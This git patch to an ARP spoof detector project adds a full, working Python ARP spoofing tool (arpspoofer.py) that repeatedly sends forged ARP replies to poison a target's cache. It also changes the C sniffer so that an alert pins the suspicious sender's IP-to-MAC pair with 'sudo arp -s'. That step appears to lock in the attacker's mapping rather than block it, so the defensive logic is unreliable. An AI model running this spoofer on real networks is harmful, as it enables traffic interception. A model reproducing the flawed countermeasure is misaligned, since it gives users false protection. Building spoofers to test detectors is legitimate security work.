From fe33d211ada7de604167e23dce042b4de2d8f6ba Mon Sep 17 00:00:00 2001
From: Uwais <muhammaduuwais132@gmail.com>
Date: Fri, 21 Mar 2025 01:00:35 +0530
Subject: [PATCH] Spoofing detection done
---
arpsniffer | Bin 16720 -> 16896 bytes
arpsniffer.c | 28 ++++++++++++++++++--
arpspoofer.py | 69 ++++++++++++++++++++++++++++++++++++++++++++++++++
3 files changed, 95 insertions(+), 2 deletions(-)
create mode 100644 arpspoofer.py
diff --git a/arpsniffer b/arpsniffer
index 5393c47e80a39eb3fd1f301d30895dea92505e9d..867d5eaa72b43f36abd1837dad341f8d5f375777 100755
GIT binary patch
delta 4838
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
B>ze=o
delta 3840
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
LP{|}WR?YKY$ljf(
diff --git a/arpsniffer.c b/arpsniffer.c
index 4e08494..2b6aac9 100644
--- a/arpsniffer.c
+++ b/arpsniffer.c
@@ -45,6 +45,21 @@ int print_available_interfaces()
return 0;
}
+void prevent_arp_spoofing(char *attacker_ip, char *attacker_mac) {
+ char command[256];
+ printf("Blocking attacker: IP: %s, MAC: %s\n", attacker_ip, attacker_mac);
+
+ snprintf(command, sizeof(command), "sudo arp -s %s %s", attacker_ip, attacker_mac);
+
+ int result = system(command);
+
+ if (result == 0) {
+ printf("ARP entry added successfully to prevent spoofing.\n");
+ } else {
+ printf("Failed to add ARP entry. Please run with sufficient privileges.\n");
+ }
+}
+
void print_version()
{
printf("ARP Spoof Detector Project\n");
@@ -80,6 +95,14 @@ char *get_ip_address(uint8_t ip[4])
return m;
}
+void arp_spoof_alert(char *attacker_ip, char *attacker_mac){
+ system("yad --title='WARNING: Serious Alert!' --text='Your System might be under ARP Spoofing Attack!' --button='OK:0' --width=400 --height=150 --image='dialog-error' --no-buttons --center --background='#660000' --timeout=5 --timeout-indicator=bottom");
+ prevent_arp_spoofing(attacker_ip, attacker_mac);
+
+ exit(0);
+}
+
+
int sniff_arg(char *device_name)
{
char error[PCAP_ERRBUF_SIZE];
@@ -140,10 +163,9 @@ int sniff_arg(char *device_name)
printf("---------------------------------------------------------------\n");
counter++;
ltimer = time(NULL);
-
if (counter > 20)
{
- printf("ARP Spoof Alert\n");
+ arp_spoof_alert(s_ip, s_mac);
}
}
}
@@ -151,6 +173,8 @@ int sniff_arg(char *device_name)
return 0;
}
+
+
int main(int argc, char *argv[])
{
if (argc < 2 || strcmp("-h", argv[1]) == 0 || strcmp("--help", argv[1]) == 0)
diff --git a/arpspoofer.py b/arpspoofer.py
new file mode 100644
index 0000000..a9fc5fe
--- /dev/null
+++ b/arpspoofer.py
@@ -0,0 +1,69 @@
+import time
+import argparse
+import signal
+from scapy.all import ARP, Ether, sendp, getmacbyip, conf, get_if_addr, get_if_hwaddr
+
+spoof_ip = None
+target_ip = None
+target_mac = None
+spoof_mac = None
+interface = None
+
+def usage():
+ print("Usage: python arpspoof.py -i <interface> -t <target> <host>")
+ exit(1)
+
+def arp_send(interface, op, sha, spa, tha, tpa):
+ ether = Ether(src=sha, dst=tha)
+ arp = ARP(op=op, psrc=spa, pdst=tpa, hwsrc=sha, hwdst=tha)
+ packet = ether / arp
+
+ sendp(packet, iface=interface, verbose=False)
+
+def arp_find(ip):
+ mac = getmacbyip(ip)
+ if mac is None:
+ print(f"Couldn't find MAC address for IP {ip}.")
+ return None
+ return mac
+
+def cleanup(sig, frame):
+ global spoof_mac, spoof_ip, target_ip, target_mac
+ if spoof_ip and spoof_mac:
+ for _ in range(3):
+ arp_send(interface, 2, spoof_mac, spoof_ip, target_mac, target_ip)
+ time.sleep(1)
+ exit(0)
+
+def main():
+ global spoof_ip, target_ip, spoof_mac, target_mac, interface
+
+ parser = argparse.ArgumentParser(description="ARP Spoofing Script")
+ parser.add_argument("-i", "--interface", type=str, required=True, help="Network interface to use")
+ parser.add_argument("-t", "--target", type=str, required=False, help="Target IP address")
+ parser.add_argument("host", type=str, help="Host IP to spoof")
+ args = parser.parse_args()
+
+ interface = args.interface
+ spoof_ip = args.host
+ target_ip = args.target
+
+ spoof_mac = get_if_hwaddr(interface)
+ if spoof_mac is None:
+ print(f"Couldn't get MAC address for the interface {interface}.")
+ exit(1)
+
+ if target_ip:
+ target_mac = arp_find(target_ip)
+ if target_mac is None:
+ exit(1)
+
+ signal.signal(signal.SIGINT, cleanup)
+ signal.signal(signal.SIGTERM, cleanup)
+
+ while True:
+ arp_send(interface, 2, spoof_mac, spoof_ip, target_mac if target_ip else None, target_ip if target_ip else None)
+ time.sleep(2)
+
+if __name__ == "__main__":
+ main()
--
GitLab